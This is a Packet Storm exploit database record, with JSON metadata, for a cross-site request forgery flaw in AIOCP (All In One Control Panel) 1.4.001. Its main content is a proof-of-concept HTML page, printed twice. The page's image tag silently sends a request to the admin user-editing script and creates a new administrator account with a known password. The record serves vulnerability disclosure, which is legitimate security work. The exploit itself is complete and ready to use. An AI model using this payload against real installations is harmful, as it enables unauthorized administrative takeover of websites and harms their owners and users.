ID PACKETSTORM:98247
Type packetstorm
Reporter AutoSec Tools
Modified 2011-02-07T00:00:00
Description
`<!------------------------------------------------------------------------
# Software................AIOCP (All In One Control Panel) 1.4.001
# Vulnerability...........Cross-site Request Forgery
# Download................http://www.tecnick.com/public/code/cp_dpage.php?aiocp_dp=aiocp
# Release Date............2/2/2011
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................AutoSec Tools
# Site....................http://www.autosectools.com/
# ------------------------------------------------------------------------
#
# --Description--
#
# A cross-site request forgery vulnerability in AIOCP (All In One
# Control Panel) 1.4.001 can be exploited to create a new admin.
#
#
# --PoC-->
<html>
<body>
<img src="http://localhost/aiocp/admin/code/cp_edit_user.php?uemode=&user_agreed=I+AGREE&user_id=2&user_name=new_admin&user_email=x%40x.com&x_user_email=%5E%28%5Ba-zA-Z0-9_%5C.%5C-%5D%2B%29%40%28%28%5C%5B%5B0-9%5D%7B1%2C3%7D%5C.%5B0-9%5D%7B1%2C3%7D%5C.%5B0-9%5D%7B1%2C3%7D%5C.%29%7C%28%28%5Ba-zA-Z0-9%5C-%5D%2B%5C.%29%2B%29%29%28%5Ba-zA-Z%5D%7B2%2C4%7D%7C%5B0-9%5D%7B1%2C3%7D%29%28%5C%5D%3F%29%24&xl_user_email=email&newpassword=Password1&user_password=81dc9bdb52d04dc20036dbd8313ed055&newpassword_repeat=Password1&user_regdate=2002-10-13+08%3A38%3A31&user_ip=127.0.0.1&user_level=10&user_language=eng&user_firstname=&user_lastname=&user_birthdate=0000-00-00&x_user_birthdate=%28%5B0-9%5D%7B4%7D%29-%28%5B0-9%5D%7B1%2C2%7D%29-%28%5B0-9%5D%7B1%2C2%7D%29&xl_user_birthdate=birth+date&user_birthplace=&user_piva=&user_fc=&MAX_FILE_SIZE=500000&user_photo=_blank.png&user_signature=&user_notes=&menu_mode=add&ff_required=user_name&ff_required_labels=name&adm=1" />
</body>
</html>
`
{"type": "packetstorm", "published": "2011-02-07T00:00:00", "reporter": "AutoSec Tools", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "38919eaab9ec2c9bc4a12d7ec1d7a248"}, {"key": "modified", "hash": "28a4c858e3281ca6a69425233cefc2bd"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "28a4c858e3281ca6a69425233cefc2bd"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "7a4b1ae1df1e22a0aed5223533d754fb"}, {"key": "sourceData", "hash": "080eefd1eafad05c734368020f163745"}, {"key": "sourceHref", "hash": "55f526650f6e750b99b3c761fbf2bdda"}, {"key": "title", "hash": "9a8d485432b6f58d362be7275321b929"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`<!------------------------------------------------------------------------ \n# Software................AIOCP (All In One Control Panel) 1.4.001 \n# Vulnerability...........Cross-site Request Forgery \n# Download................http://www.tecnick.com/public/code/cp_dpage.php?aiocp_dp=aiocp \n# Release Date............2/2/2011 \n# Tested On...............Windows Vista + XAMPP \n# ------------------------------------------------------------------------ \n# Author..................AutoSec Tools \n# Site....................http://www.autosectools.com/ \n# ------------------------------------------------------------------------ \n# \n# --Description-- \n# \n# A cross-site request forgery vulnerability in AIOCP (All In One \n# Control Panel) 1.4.001 can be exploited to create a new admin. \n# \n# \n# --PoC--> \n<html> \n<body> \n<img src=\"http://localhost/aiocp/admin/code/cp_edit_user.php?uemode=&user_agreed=I+AGREE&user_id=2&user_name=new_admin&user_email=x%40x.com&x_user_email=%5E%28%5Ba-zA-Z0-9_%5C.%5C-%5D%2B%29%40%28%28%5C%5B%5B0-9%5D%7B1%2C3%7D%5C.%5B0-9%5D%7B1%2C3%7D%5C.%5B0-9%5D%7B1%2C3%7D%5C.%29%7C%28%28%5Ba-zA-Z0-9%5C-%5D%2B%5C.%29%2B%29%29%28%5Ba-zA-Z%5D%7B2%2C4%7D%7C%5B0-9%5D%7B1%2C3%7D%29%28%5C%5D%3F%29%24&xl_user_email=email&newpassword=Password1&user_password=81dc9bdb52d04dc20036dbd8313ed055&newpassword_repeat=Password1&user_regdate=2002-10-13+08%3A38%3A31&user_ip=127.0.0.1&user_level=10&user_language=eng&user_firstname=&user_lastname=&user_birthdate=0000-00-00&x_user_birthdate=%28%5B0-9%5D%7B4%7D%29-%28%5B0-9%5D%7B1%2C2%7D%29-%28%5B0-9%5D%7B1%2C2%7D%29&xl_user_birthdate=birth+date&user_birthplace=&user_piva=&user_fc=&MAX_FILE_SIZE=500000&user_photo=_blank.png&user_signature=&user_notes=&menu_mode=add&ff_required=user_name&ff_required_labels=name&adm=1\" /> \n</body> \n</html> \n`\n", "viewCount": 0, "history": [], "lastseen": "2016-11-03T10:28:57", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/98247/AIOCP-All-In-One-Control-Panel-1.4.001-Cross-Site-Request-Forgery.html", "sourceHref": "https://packetstormsecurity.com/files/download/98247/AIOCP-1.4.001-xsrf.txt", "title": "AIOCP (All In One Control Panel) 1.4.001 Cross Site Request Forgery", "enchantments": {"vulnersScore": 4.3}, "references": [], "id": "PACKETSTORM:98247", "hash": "ca5e5f0efbb3290462939d56f365519dd0e62886886557ced4dbf93c16a49ef6", "edition": 1, "cvelist": [], "modified": "2011-02-07T00:00:00", "description": ""}
{"result": {}}
